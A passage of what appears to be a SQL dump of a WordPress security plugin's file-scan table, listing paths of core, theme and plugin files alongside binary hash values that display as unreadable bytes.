-\n�A��o','',0,'?'),('\n����I��n�Pc','wp-content/themes/accelerate/js/jquery.cycle.all.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~h\r(�1L#��Z�','��B�ŸY���]x&��A����_�3��&���V>','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('\n�\Z��Ʀ������','wp-content/themes/fabulous-fluid/languages/da_DK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3*5�`^�J B','��M�ŲS;a��Ͼ���4XO�(�o�u','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PH��m2n\0+�	|Pqi�','��w͇$[�פJ�ʥW�//�����A','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\n��5��=�IK�&{�P','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_454545_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#¼�!�A�Ia','i)��&�x	D�D����k���rp�\'c�~�','',0,'?'),('\n�<OР���j��qI','wp-content/themes/hueman/languages/es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Jb&VȀU����4��','�j}Y�{ŃFqC\Z�CKIf�Q��m4������','',0,'?'),('\n�u����<�:>`<>P','wp-content/themes/hueman/assets/front/img/thumb-medium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9= �켄��Keer','��w7��1�\rGF��VM�|�<=LJ|ؤƧ�','',0,'?'),('\n�:]J�w����E�','wp-content/themes/hueman/option-tree/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�e�W|�9���+u','-Qp����F�j�p�.x���2�s�ì�\Z�','',0,'?'),('\n�n.�����/�jG��','wp-content/themes/aqueduct/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϥ�ςe\'�b峬ޑ�','`~��z�&�G��)z|B��_Y�L��p�v','',0,'?'),('\n�Oe�lg�n�3\"��6�','wp-content/themes/twentynineteen/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~*2W�p	�d�','v\\$�YTp�>*�V�&Q���=��^ÍC{ExX','',0,'?'),('\n�!^�划����T\n�','wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F5vElT��ͤ���Q5','W�F����:ڮU��3���dm�0��	���','',0,'?'),('\n�Ʒ��<���\Z6�HD�','wp-content/themes/illdy/layout/fonts/font-awesome/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ-�p�莈�D�ɢ~�','��FTM�߇�E�7y6&<-���5]��|�VQ','',0,'?'),('\n�G�E	��>��\'','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-icons_ffd27a_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���`����σ,p','9ekKY!-jx�z�V㥱�V������!�a(^','',0,'?'),('\n���w�t��.	���','wp-content/plugins/wordpress-seo/admin/class-option-tab.php',0,'����΀m��7�E�','����΀m��7�E�','��3]�؁��(�)3U4��\\��$1�C ��','',0,'?'),('\n�@�g��+T;V��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���\r@)��뻚','�;����_I��m�1�����\n�9|!޶��','',0,'?'),('\n�\r�B��p̭','wp-admin/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';&�0G�����Q��ʚ','�gJRb��\0tf�2Å�&��0u�jYH�i��','',0,'?'),('\n��:�X2�L��nc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�z��p���(�,','��,����%u\Z��Rz�B�\r#��~�+`�5y�','',0,'?'),('\n�Gƙn��\Z@1+U]�','wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Qk�/.L��4','���&��	q�*�bl_u<�΍fT\nn�()��l','',0,'?'),('\n���7�=N>���','wp-content/plugins/wp-date-remover/admin/class-wp-date-remover-admin.php',0,'�^����1���','�^����1���','��*�}�hDO�f�Ks~�l��^^p���`','',0,'?'),('\n��m�Apv?�=�~','wp-content/themes/panoramic/customizer/customizer-library/extensions/sanitization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^~�57�@T�G','Cg{������ֱ��Ts48G:q��','',0,'?'),('l�\rf(z�V��W�','wp-content/themes/tortuga/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r����/��K2�(�','�̠���LL�uv��f_��͂F�(�=A','',0,'?'),('��= ���]�D�ע','wp-content/themes/relia/woocommerce/single-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\Ze&t��H�T`�','6-��A���;�aڞ x�\n���l���','',0,'?'),('`\\�/w�XwQ�%��','wp-content/themes/fluida/resources/js/frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QI\r���p�v,pm#','�$��K+\\�q6�Зp���E9��[�`O��w7�','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('(hɾ	�Z��v�-�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.cs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4S��2Zn��Qb','p�͹bD\"��xF_���>i}�M[>~zK�T>�','',0,'?'),(',�������pn	�^','wp-content/themes/fabulous-fluid/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�����ҧP\'','�묶L؁�R:�A���;�/��z[�<��','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),('Kw[/zA�uO�����','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_gradients.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��V�$q�<lL','�^-%M�2�L�Ӣ��K�W��+n��+���r�','',0,'?'),('b��6�\n�	SgR�@%','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-tab-section.php',0,'��4��|��w','��4��|��w','�P��ċmP��ٯ|�=<),�0L����ǥfe','',0,'?'),('}spK�� ��:�','wp-content/plugins/akismet/views/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eY�]�Z�.^<��&Un','�G�,|�8������i1��<2�,�8��+w','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('��lo���Y\Z��)','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iN���t�d��{�','�u��8���z��l��߄�8��wT����D)','',0,'?'),('���o\\G�����>','wp-content/themes/skt-construction-lite/images/free-vs-pro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lU�i�a�?�ש�j','b,/:�v\\����G��I3SC0Ds�kU��	�','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�י_xL9�~h��\0','�H*+w�����Cy�	m�v�1R�2\ng�\\�','',0,'?'),('�2���M-q	,\"�\'@','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	�','',0,'?'),('��@�x1�,���)','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/bootstrap3/js/bootstrap.js',0,'W�Gap��/R+x','W�Gap��/R+x','6r�k���^���Mu}�gK�9�\rT78/','',0,'?'),('���B��i��:','wp-content/themes/morfeu/assets/js/bootstrap/affix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h<��d���u8�~��','9�½��u(��J�2`���t���Ӭ��m','',0,'?'),('��!���\\Qq��|~�','wp-content/themes/sg-window/inc/js/image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5�~&�V�\Z[0�','$�8�Iv��Q�L��N�H\nL@:?kL�7�Y�_','',0,'?'),('�NK$<$!��^C%\0�','wp-content/themes/illdy/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g /]m�c!Rfص��7�','ÚM�A��76���v٬�x�-�ۣ��N','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�r��D����','wp-content/themes/relia/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�括�G��;I�-��r�','1Cda�@�dlc�F^�ɘ�hs���SNL$���Z','',0,'?'),('�c\"ml� �Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('ئ!S�oE�(ѮO�','wp-content/themes/vega/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2��9�i�(�8','̲��l�z\'�!p>W�W��>�e��\Zw�����','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�a2��%x�h�YB','p�����~���&�������W�OX(Û ','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�lh�¸�j�68��','V]�l��1W�+	{6v��ޣ��C���=��','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-\n�B�\0z�Y�Z�G�','!��~�uanK��r��e���\Z/�*�,��','',0,'?'),('I2�r���;�]����','wp-content/themes/alpha-store/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����6��{��9AH','�\r�8��γe���y���̿ǹ��H����-�_','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('XWѡy�)shv��','wp-content/themes/fluida/resources/js/ajax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�\'��!}��M','���V���#��ĥ��q8;��A��p�N�f ~','',0,'?'),('Z�uINU����c�b�','wp-content/themes/point/images/plugin-no-thumb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�^�P�d?:y��','	�$(����G���;�f��&�=t�~�굮��','',0,'?'),('[�i�*9x�/͛;��','wp-content/themes/fluida/resources/images/slider/static.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�d�t�\0�_\\�#','#��mP;�$��_���ⷛ�5�T���}�h','',0,'?'),('ru\02Au��2�_�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.it.php',0,'x���SM��/e�5p5','x���SM��/e�5p5','Zs�]U���V�Y7�-��֚CYn[au����]�','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('{�2~��|�i�','wp-content/themes/alpha-store/languages/cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;)c`}���Y��/','��������v\ZkQ�E�L#�/؍��FJ�	�@','',0,'?'),('���d��Z�c1��H�','wp-content/themes/hueman/languages/tr_TR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J{M}�oN�Q�','k��E�\rA\"G&�����\0�w;N;p[C�zB�','',0,'?'),('�F�͍_����vc','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_AssertionCredentials.php',0,'4u	��s����2@�','4u	��s����2@�','�����ȩ:��S�PP�Kٯ���].��u�','',0,'?'),('��P>�Fބ=�_�','wp-content/plugins/wordpress-seo/admin/formatter/class-post-metabox-formatter.php',0,'�\"�_�Fp,R\r�y','�\"�_�Fp,R\r�y','`��?և#P�����y+��)Ò\'�æ��IU','',0,'?'),('�e�l-�0am�%�\\j�','wp-content/themes/morfeu/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�u�%bCݹ�x9Sr�','\0VAAu	 �N�B������P���\Z�㕓','',0,'?'),('�9�{Β����B�','wp-content/plugins/unyson/framework/core/class-fw-manifest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r%VpS(��1��N�V','��Ri�6�㩙G�$��mj�Rd�@�p�el(','',0,'?'),('��GO�J�!��־','wp-content/themes/skt-construction-lite/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��}�V����9','Q�ʑ��~�La�V�ɢ, �{��gH)뿶��','',0,'?'),('�)&�M2�D�\rY�U^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�����8v��w5ǿ','����Vs��y�f(����G�8�hM����\Z�j��','',0,'?'),('�����4KIxL3��','wp-content/plugins/wordpress-seo/admin/views/about.php',0,'oS�����Zk��m6�','oS�����Zk��m6�','RvSF�yb�`a�g\"O\'�]�Ec��\"4&AE\n','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N:�<�Oq��CR�\0�','�F	�#}w���~��PӼ>�̓�I�g���N','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�)�ꅴU&�>l�m','wp-content/themes/fluida/includes/styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�KF3G���<�K]�c	','\'��T�(�&bI��/����;�sN-B.�','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ϸ�9P���<��T�','?�ke�a�J@�U��ů���=������','',0,'?'),('��;X\"�`�uɜ','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-form-tab.php',0,'JK��Vpۃn�K1','JK��Vpۃn�K1','_��U�)Ew�J�_�x\'���3����-�','',0,'?'),('�h��.X@3y�i-�=','wp-content/themes/panoramic/library/includes/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Q��̹M�}$I�$��','����RN�/~�1��$�ϦRs��X���A���','',0,'?'),('�Lf���c�~{�W�{�','wp-content/themes/tortuga/css/themezee-related-posts.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xB���闅X�n�0B�','[Әrnj1�8\"��8�N�t]\0`f\Z�N$��','',0,'?'),('����m���o?�','wp-content/themes/aqueduct/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n^���^�ljIe��','�v?����0��镒Y��{��͂98f>o#Q�G','',0,'?'),('�Q�L�1�z^��AT�k','wp-content/themes/vega/parts/frontpage-latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�el^��{>�aj�','׊~A��ٱ�b%�+~�*�*��$��Z ','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ħh�(%����U','��~žb@\n�|;�2�K5��|27��$9�\n#��','',0,'?'),('\r[�0���~��n�T�','wp-content/themes/clean-magazine/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�ף\\5�u��:','?\na@�Wф�J��Ή1��$�8XtH�5�','',0,'?'),('\rvk�P-�t��G���Hm','wp-content/plugins/contact-form-7/modules/checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��nY��=�g�G�','\Z�^�����\0�i�\"�L*����ٰ�N���','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/v�	h7�@A�h','P[ĝ�C1��֡?qt�����C�����w#','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SDRU���7}�','�n:kɆZ���/��|L���S����n�D.N','',0,'?'),('\r|K��d��É�Ҏ�m','wp-content/themes/nirvana/fonts/ubuntu-c-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L���d��;�','a�-�1�����y�C�d���F\Z�)p��','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i�	��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,����$K7��`�','�Ld�ɮE�d�^�ro�z�_e�ؑ�9�Z','',0,'?'),('\r�Iu���ȭ��a�','wp-content/themes/verbosa/admin/images/image-style-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�f�s��|:���','�Jd}G,HΖ��8��o%�լh�*1���','',0,'?'),('\r���&dքj7�����','wp-content/plugins/wordpress-seo/js/dist/wp-seo-dismissible-350.min.js',0,'���?�f&C�bB�ӎ','���?�f&C�bB�ӎ','f���a†0��-Ը�P��sa�8���`�5O�','',0,'?'),('\r�\n�v<�y\r�OF���','wp-content/plugins/wordpress-seo/vendor/xrstf/composer-php52/lib/xrstf/Composer52/Generator.php',0,'��7j`�1e=��jv','��7j`�1e=��jv','�\0�\0���%�ȰW��\n\0�IH�G�(��','',0,'?'),('\r�������c��{^�','wp-content/themes/clean-magazine/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vbp�l�-h�u�hp','�z�}q���KZ�x�/I�H�S��?Ҋ,� 6��\r','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J{,pe�F�Z:�`�','�\'��k�\'$�a�ٖ �;��(\"0a=��5�D�O','',0,'?'),('\r�d���uQ�n�k','wp-content/themes/twentynineteen/sass/media/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<2Q�.�%�|=�S�','$�?2���sȉ�F�G?TC?EkB��f� ��S�','',0,'?'),('\r����W%�{kˈ�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/io/Google_REST.php',0,'���z���>�4�`��f','���z���>�4�`��f','�X�hf�Z��.?Y^ΖM�^P�D��Xk�I','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$i�0v��on\'ё��9','�,	-���i� ����ر�+jן\0�\\֢�','',0,'?'),('\r��!�qzN���Tc�vh','wp-content/themes/wen-business/assets/js/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�\n��&���r','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('\r�J<�^��G�9���','wp-content/themes/mh-magazine-lite/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L[M	;���j�?','2c[1�L^��8\Z����t;zjF��Jw���','',0,'?'),('\r��X���LD�-�B','wp-content/themes/clean-magazine/languages/clean-magazine.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��}5+��K&���\Z','�]�a��������19�\0��u�!}','',0,'?'),('\r�]MR��c��;�','wp-content/themes/travelify/languages/he_IL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̾:G9vXթ��;	�','붸�H�U:�{A��eR.�]�D�Fg`nZ���e','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e׭/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r׾� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('\rӃ��H��n�<Z�','wp-content/themes/hueman/assets/front/img/demo/8-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6^)k[�~�ʑB� �4','2�D�ޙ9���\"�d��!��]�X��c�4ͤ','',0,'?'),('\r�q��&\0\Z��3��x�','wp-content/themes/clean-magazine/css/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;(H��-Jht�x�','��;�m��}������e(~�y0m�=�},','',0,'?'),('\rޑ��Ų��]����','wp-content/themes/illdy/layout/js/bootstrap/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��O�{Mu���','6r�k���^���Mu}�gK�9�\rT78/','',0,'?'),('\r�¶2O��2���&�@','wp-content/plugins/contact-form-7/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�*��F:�s�{�','��+�|�I�[�3�%o�]͖�JYx u�\Z_�','',0,'?'),('\r�a%!�@��pC�u�','wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/js/jquery.datetimepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Փ��GuJRb�7�','�*ddN�_��$�Pz�N���V���6����ȶW`','',0,'?'),('\r�~�S��d�\Z\"S��(','wp-content/plugins/spam-captcha/js/js_admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('\r��,�1£��B�\"�','wp-content/themes/panoramic/library/includes/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b^��z����cU','q��4+Y\\���\Z�F���ԗ��� .C�','',0,'?'),('\0�[|��}��袄D�','wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jV�@K����7�','����7y�^-��\'���<^?b�L���i=x�','',0,'?'),('uX�9�Tq7�ʹgD','wp-content/themes/sg-window/publication/js/customizer.js',0,'Ű��k�1�Se9E','Ű��k�1�Se9E','�g�O�\0:�\r�!�z��fy�^��(}(��:`\"','',0,'?'),('��QB59���*\0�','wp-content/themes/wen-business/inc/customizer/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�$��a�|��#','��T]r͓�q~�6��B��Ыr(���jc���','',0,'?'),('	}݈̓�$z߬��K','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/static/scripts.js',0,'�Ղ	����g��${Lq','�Ղ	����g��${Lq','���`#P\Z�F�/ZKt8a�\n�$�*��G�3','',0,'?'),('%�r�yh�\\�z�Rz�c','wp-content/plugins/spam-captcha/core/lang/SL_framework-fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�e̚=����i','\0�k��Ĺ�hn��K_�����lJy|l�?','',0,'?'),(')�Qz��D�4��ӧ:','wp-content/themes/point/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\'Ռ7�������','xnȑ��uf���BV���׍��_0�� \'�','',0,'?'),('3Q8���f�����t3','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/views/cell-worksheet-template.php',0,'�3���)�2���','�3���)�2���','s�ßj�Mn}�M�(�y�|�����rT�0','',0,'?'),('8\n�l�l��Q��2�F','wp-content/themes/nirvana/admin/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wה7�����X7;','�.��7���L��Ù�����&g��������!','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2�?������+Y��','�i���;�M3�U�P�<�XZ��z����','',0,'?'),('X��]�WF�Z��\\','wp-content/plugins/contact-form-7/languages/contact-form-7-lt_LT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&*g��>4�(�n�','�U�i\\+Ȏ���q,3iz��O�_�Ƅ���\n�','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@7ت��~4[,|��','[�lKj�����b�)	ruPRe(�V?���+','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('{m�ѡ�MYm�|;�F','wp-content/themes/twentyseventeen/assets/images/coffee.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aޞ�Eoe�	P;�b�','\\lϸv{z�2����?�H�9�l	Mt��#�er[�','',0,'?'),('��.l��v���5��','wp-content/themes/mh-magazine-lite/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2@N�*�ؿ�B\'�F','���č��oz�0u�����G;B.#CCV��','',0,'?'),('���n�#�Mxk�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ru.php',0,'+��?F\"�\n��ο�\nK','+��?F\"�\n��ο�\nK','�\0��*��\Z���-��o�o�t�q(�zs2E�_','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�����U��)��ʀ3G','wp-content/plugins/akismet/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u(Y�kR��S�','�%O�N+�84Nm�[�ւ���/f�wc���)\0p��','',0,'?'),('�);)]�\'�1p��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.cl.php',0,'7�M�}	�n�J�Vg$l','7�M�}	�n�J�Vg$l','��\'^��r��]�I���b�\\�